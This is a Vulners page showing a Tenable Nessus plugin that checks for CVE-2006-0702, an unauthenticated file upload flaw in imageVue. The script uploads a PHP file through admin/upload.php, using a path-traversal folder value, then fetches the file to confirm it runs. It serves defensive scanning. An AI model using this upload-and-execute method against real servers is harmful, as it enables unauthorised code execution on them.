Vulners
Lucene search
imageVue < 16.2 admin/upload.php Unrestricted File Upload
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
 | CVE-2006-0702 | 15 Feb 200611:00 | – | cve |
 | CVE-2006-0702 | 15 Feb 200611:00 | – | cvelist |
 | EUVD-2006-0709 | 7 Oct 202500:30 | – | euvd |
 | CVE-2006-0702 | 15 Feb 200611:06 | – | nvd |
 | Directory traversal | 15 Feb 200611:06 | – | prion |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/archive/1/424745/30/0/threaded |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(20991);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-0702");
script_bugtraq_id(16594);
script_name(english:"imageVue < 16.2 admin/upload.php Unrestricted File Upload");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that allows arbitrary
uploads.");
script_set_attribute(attribute:"description", value:
"The remote host is running imageVue, a web-based photo gallery
application written in PHP.
The installed version of imageVue allows unauthenticated attackers to
upload arbitrary files, including files containing code that can then
be executed subject to the privileges of the web server user id.
In addition, it is also reportedly affected by information disclosure
and cross-site scripting vulnerabilities, although Nessus has not
checked for those issues.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/424745/30/0/threaded");
script_set_attribute(attribute:"solution", value:
"Upgrade to imageVue 16.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/03/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/imagevue", "/imageVue", "/ImageVue", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs) {
# Get a list of possible folders.
w = http_send_recv3(method:"GET", item:string(dir, "/dir.php"), port:port);
if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
res = w[2];
# If it looks like it's from ImageVue...
if (
'<?xml version="1.0"' >< res &&
'<folder path="' >< res
) {
# Find a folder that allows uploads.
while (res) {
res = strstr(res, '<folder path="');
if (res) {
attr = res - strstr(res, ">");
folder = ereg_replace(pattern:'^.+ path="([^"]+/)" .+ perm="7.+', replace:"\1", string:attr);
break;
res = strstr(res, ">") - ">";
}
}
# Try to upload a file.
if (folder) {
file = string(rand_str(charset:"abcdefghijklmnopqrstuvwxyz0123456789_"), "-", unixtime(), ".php");
bound = "nessus";
boundary = string("--", bound);
postdata = string(
boundary, "\r\n",
'Content-Disposition: form-data; name="uploadFile"; filename="', file, '"', "\r\n",
"Content-Type: application/x-php\r\n",
"\r\n",
"<?php phpinfo() ?>\r\n",
boundary, "\r\n",
'Content-Disposition: form-data; name="getpath"', "\r\n",
"\r\n",
"./../", folder, "\r\n",
boundary, "--", "\r\n"
);
w = http_send_recv3(method: "POST", port:port,
item: dir+"/admin/upload.php",
content_type: "multipart/form-data; boundary="+bound,
data: postdata);
if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
# Finally, try to run the script we just uploaded.
folder2 = urlencode(
str:folder,
unreserved:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/"
);
w = http_send_recv3(method:"GET", item:string(dir, "/", folder2, file), port:port);
if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
res = w[2];
# There's a problem if it looks like the output of phpinfo().
if ("PHP Version" >< res) {
security_hole(port);
}
}
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2022 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 25
EPSS0.09152